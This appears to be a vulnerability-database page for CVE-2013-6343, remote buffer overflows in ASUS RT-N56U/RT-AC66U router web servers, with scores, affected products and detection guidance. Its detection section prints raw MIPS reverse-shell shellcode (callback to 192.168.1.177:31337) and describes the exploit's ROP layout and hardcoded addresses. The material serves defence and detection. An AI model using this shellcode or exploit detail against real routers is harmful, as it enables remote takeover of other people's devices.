CVE-2013-6343
published 2014-01-22CVE-2013-6343: Multiple buffer overflows in web.c in httpd on the ASUS RT-N56U and RT-AC66U routers with firmware 3.0.0.4.374_979 allow remote attackers to execute arbitrary…
PriorityP262critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
9.71%
94.9th percentile
Multiple buffer overflows in web.c in httpd on the ASUS RT-N56U and RT-AC66U routers with firmware 3.0.0.4.374_979 allow remote attackers to execute arbitrary code via the (1) apps_name or (2) apps_flag parameter to APP_Installation.asp.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| asus | rt-ac66u_firmware | — | — |
| asus | rt-n56u_firmware | — | — |
| asus | tm-ac1900_firmware | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\xff\xff\x04\x28\xa6\x0f\x02\x24\x0c\x09\x09\x01\x11\x11\x04\x28\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20\x80\x01\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20\x80\x01\x27\x28\x80\x01\xff\xff\x06\x28\x57\x10\x02\x24\x0c\x09\x09\x01\xff\xff\x44\x30\xc9\x0f\x02\x24\x0c\x09\x09\x01\xc9\x0f\x02\x24\x0c\x09\x09\x01\x79\x69\x05\x3c\x01\xff\xa5\x34\x01\x01\xa5\x20\xf8\xff\xa5\xaf\x01\xb1\x05\x3c\xc0\xa8\xa5\x34\xfc\xff\xa5\xaf\xf8\xff\xa5\x23\xef\xff\x0c\x24\x27\x30\x80\x01\x4a\x10\x02\x24\x0c\x09\x09\x01\x62\x69\x08\x3c\x2f\x2f\x08\x35\xec\xff\xa8\xaf\x73\x68\x08\x3c\x6e\x2f\x08\x35\xf0\xff\xa8\xaf\xff\xff\x07\x28\xf4\xff\xa7\xaf\xfc\xff\xa7\xaf\xec\xff\xa4\x23\xec\xff\xa8\x23\xf8\xff\xa8\xaf\xf8\xff\xa5\x23\xec\xff\xbd\x27\xff\xff\x06\x28\xab\x0f\x02\x24\x0c\x09\x09\x01
bytes↗
\x2c\x08\xbd\x27\x09\xf8\xa0\x03\x32\x41\x61
- →Detect HTTP POST requests to /APP_Installation.asp with an oversized apps_name parameter (>109 bytes) — the exploit uses 109 bytes of junk followed by ROP chain data. ↗
- →Alert on HTTP POST to /APP_Installation.asp containing both apps_name and apps_flag parameters, especially with apps_flag=sdb1 and a large apps_name value. ↗
- →Inspect the Cookie header for an hwaddr field with binary/non-printable content exceeding 35 bytes — the exploit embeds 200-byte MIPS shellcode in the hwaddr cookie value. ↗
- →Monitor for outbound TCP connections to port 31337 from ASUS RT-N56U/RT-AC66U devices, which indicates successful reverse shell execution. ↗
- →Fingerprint the target by checking for 'RT-N56U' in the HTTP server banner response to a HEAD / HTTP/1.1 request. ↗
- ·The exploit was tested specifically against firmware version 3.0.0.4.374_979; other firmware versions may also be vulnerable but were not confirmed. ↗
- ·The ROP chain uses hardcoded base addresses for ld_uClibc (0x2aaa8000) and libc (0x2ab5f000) in the httpd address space; these offsets are specific to the tested firmware and may differ on other builds. ↗
- ·The Stage 3 reverse shell shellcode hardcodes the callback IP 192.168.1.177 and port 31337; real-world attackers would modify these values. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
No writeups or analysis indexed.
http://infosec42.blogspot.com/2014/01/exploit-asus-rt-n56u-remote-root-shell.htmlhttp://osvdb.org/102267http://www.exploit-db.com/exploits/31033http://www.securityfocus.com/bid/65046https://support.t-mobile.com/docs/DOC-21994http://infosec42.blogspot.com/2014/01/exploit-asus-rt-n56u-remote-root-shell.htmlhttp://osvdb.org/102267http://www.exploit-db.com/exploits/31033http://www.securityfocus.com/bid/65046https://support.t-mobile.com/docs/DOC-21994
2014-01-22
Published